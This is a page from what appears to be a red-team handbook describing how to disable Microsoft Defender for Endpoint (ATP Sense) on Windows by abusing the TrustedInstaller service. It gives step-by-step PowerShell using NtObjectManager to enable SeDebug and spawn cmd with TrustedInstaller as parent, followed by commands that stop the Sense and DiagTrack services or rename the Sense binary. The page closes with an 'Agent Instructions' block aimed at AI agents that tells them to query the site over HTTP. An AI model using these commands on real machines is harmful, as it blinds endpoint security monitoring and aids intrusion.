# Trusted Installer MsSense is a PPL service, meaning that even with SYSTEM privileges, we will not be able to stop this. However Microsoft allows "trusted callers" to manage protected services and other critical resources in the system. This "trusted caller" is a service called TrustedInstaller. You may have seen this certain service while looking at ACLs of certain applications: ![](https://216667902-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MfpNy7QBsIOaHJ1vcf-%2F-MgsM2O3VxSq3QOLl4Sk%2F-MgsQTfz76-OFHcID1sL%2Fimage.png?alt=media\&token=b13606e3-60fd-4d39-b789-58841dc451de) As you can see, it is given full control of calc.exe, and is the only service that has full control. It is also given full control over all the SVCHOST, which hosts the diagtrack service binary. ![](https://216667902-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MfpNy7QBsIOaHJ1vcf-%2F-MgsM2O3VxSq3QOLl4Sk%2F-MgsQjALYU9kiVxhV23_%2Fimage.png?alt=media\&token=702af2c4-30c9-4c5a-bd91-40702a7c4c7e) The TrustedInstaller service is also a service which does not have PPL configured: ![](https://216667902-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MfpNy7QBsIOaHJ1vcf-%2F-MgsM2O3VxSq3QOLl4Sk%2F-MgsR4RVQtIoHYNpmc_H%2Fimage.png?alt=media\&token=ad720569-4157-46e7-9ee2-165ab663f5cd) So does that mean we can just change Trustedinstaller’s binary path to stop the ATP Sense service? ``` sc config TrustedInstaller binPath= "cmd /C sc stop sense" && sc start TrustedInstaller ``` Well, you can't, since this is already a known technique that ATP is aware of, and will make an alert if you try to do this. Alright, so we know that TrustedInstaller is a service configured without PPL, we could potentially spawn a cmd prompt with DiagTrack as its parent(cmd will inherit the TrustedInstaller's security token descriptor), and use that cmd prompt to disable the ATP service that way. Information of why this works is in this picture: ![](https://216667902-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-MfpNy7QBsIOaHJ1vcf-%2F-MgsM2O3VxSq3QOLl4Sk%2F-MgsTT98hXFMBYntDXmP%2Fimage.png?alt=media\&token=664a4b24-e9ec-4b23-8cb0-7020c6d2bbdf) To do this, we need the SeDebug privilege(which you can enable if you are admin). We will use PowerShell, and two .NET DLLs from James forshaw which will ease the whole process for us. These are called NtObjectManager.dll and NtApiDoNet.dll. You can find these DLLs here: {% embed url="" %} These DLLs will not trigger any alerts due to the fact that they are legitimate windows code and are just wrappers around low-level code. We will first load those 2 dlls in memory: ``` $a = [System.Reflection.Assembly]::Load($NtObject.dll) $b = [System.Reflection.Assembly]::Load($NtApi.dll) ``` We will then import the loaded assemblies: ``` Import-module $a Import-module $b ``` We will then enable the SeDebug privilege: ``` $token = Get-NtToken -Primary $token.SetPrivilege([NtApiDotNet.TokenPrivilegeValue[]]"SeDebugPrivilege", [NtApiDotNet.PrivilegeAttributes]"Enabled") ``` And then launch the TrustedInstaller process and get a handle to it: ``` start-service trustedinstaller $handle = Get-NtProcess -Name "TrustedInstaller.exe" ``` We will then call the CreateProcess method to launch cmd.exe with TrustedInstaller.exe as its parent process. ``` $config = New-Object NtApiDotNet.Win32.Win32ProcessConfig $config.CommandLine = "cmd" $config.CreationFlags = [NtApiDotNet.Win32.CreateProcessFlags]16 $config.ParentProcess = $handle [NtApiDotNet.Win32.Win32Process]::CreateProcess($config) ``` Then our CMD will popup! From there, we can just stop the MsSense and Diagtrack service ``` C:\Windows\System32> Sc config diagtrack binpath="ploopy" C:\Windows\System32> Sc stop diagtrack ``` Or just rename the executable: ``` rename "C:\Program Files\Windows Defender Advanced Thread Protection\SenseCncProxy.exe" blah ``` This will effectively stop the ATP process. --- # Agent Instructions: Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the `ask` query parameter: ``` GET https://kwcsec.gitbook.io/the-red-team-handbook/techniques/defense-evasion/ata-atp/blocking-disabling-telemetry/trusted-installer.md?ask= ``` The question should be specific, self-contained, and written in natural language. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.